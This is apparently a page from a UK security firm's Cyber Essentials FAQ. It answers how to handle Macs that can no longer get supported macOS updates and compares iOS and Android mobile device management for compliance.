How do we handle Macs that can't upgrade to newer macOS versions?
A Mac that can't upgrade fails CE because no supported macOS means no security patches. Your options: replace the hardware, repurpose the Mac for offline-only tasks outside your CE scope, or run a supported Linux distribution if the hardware supports it. Apple drops security support roughly three years after a macOS release, so plan hardware refresh cycles accordingly.
Keywords: macOS, unsupported, hardware replacement, Linux, end of life | Confidence: 0.9
What's the difference between iOS and Android MDM implementation?
iOS is more restrictive by default, which simplifies CE compliance. App Store vetting reduces malware risk, and Apple's MDM framework is consistent across all iPhones. Android varies more between manufacturers, so Samsung Knox behaves differently from stock Android MDM. Both platforms pass CE assessment when managed through Intune, Google Workspace or a similar MDM. iOS is slightly easier to evidence because the controls are more uniform.
Keywords: iOS, Android, MDM, Samsung Knox, Intune, comparison | Confidence: 0.88
Get cybersecurity insights delivered
Join our newsletter for practical security guidance, Cyber Essentials updates, and threat alerts. No spam, just actionable advice for UK businesses.
Related Guides
Cyber Essentials Plus in 5 Days: NHS Wales Contractor Case Study
How Net Sec Group delivered Cyber Essentials and CE Plus certification to an NHS Wales contractor in 5 days to meet a contract deadline. The full process from scoping to certification.
How Long Does a Cyber Essentials Plus Assessment Take?
CE Plus testing takes 1-3 days depending on your sample size. But the timeline starts at basic CE and has mandatory windows you can't compress.
Cyber Essentials Plus Assessment Process: What Actually Happens
Five test cases, a sampling methodology, and a 30-day remediation window. Here's what the CE Plus assessment covers and what to expect.
Ready to get certified?
Book your Cyber Essentials certification or check your readiness with a free quiz.